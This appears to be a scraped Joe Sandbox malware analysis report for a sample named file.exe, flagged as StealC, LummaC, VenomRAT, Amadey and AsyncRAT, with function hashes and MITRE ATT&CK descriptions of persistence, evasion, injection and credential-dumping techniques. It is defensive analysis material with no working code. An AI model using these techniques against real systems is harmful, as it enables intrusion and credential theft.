Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3709564156.0000000008B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8b40000_H3tyh96.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 462f806103f530d795e63e7cd30240698a3559f3884ee21002b46cc62c982ebf
Instruction ID: f01e9b43d45146c777f34a0efcc64b3d7b2084cfc1ed0a6aec1c12724173bbc5
Opcode Fuzzy Hash: 462f806103f530d795e63e7cd30240698a3559f3884ee21002b46cc62c982ebf
Instruction Fuzzy Hash: A2B09237A4400889EB109A88B4423EDFB20F790226F104067C21062000C23201799791

Function 093CEDB0 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3712858715.00000000093C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 093C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_93c0000_H3tyh96.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b76679b0a354449729844e828cdbdd8dc5f87ab3334555cc76ca9f307cd6f9ad
Instruction ID: a0ccf6e4bed68dc0c69f5d0bbd707ad7c253f4111acce2a0e91a8f8d8fd4bd45
Opcode Fuzzy Hash: b76679b0a354449729844e828cdbdd8dc5f87ab3334555cc76ca9f307cd6f9ad
Instruction Fuzzy Hash: 03B092351602088F82409B68E448C00B3E8AB08A243118090E10C8B232C621F8008A40

Function 093C90C0 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3712858715.00000000093C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 093C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_93c0000_H3tyh96.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13dfbc88038ff85581dd4c0b0b1fe96d0ecaee6ff40395fdc2d168fc7952510f
Instruction ID: c62f474b561424d7e74ef98453b67006cae542d48906eb2552a4d19b2a235e37
Opcode Fuzzy Hash: 13dfbc88038ff85581dd4c0b0b1fe96d0ecaee6ff40395fdc2d168fc7952510f
Instruction Fuzzy Hash: 60C09230501244CFDB16CF30C0488007B72EFA230535A40ECD0898B523C732DCC2CB10

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: LummaC

Threatname: VenomRAT

Threatname: Amadey

Threatname: AsyncRAT

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Stealing of Sensitive Information

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_RegSvcs.exe_33aff8b3a22dbaf8353e7499fe0f8a940e360e8_79f63236_c33352ba-a302-4a0a-9bad-796673328cbe\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8B5C.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8D41.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8DB0.tmp.xml

Windows Analysis Report
file.exe

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre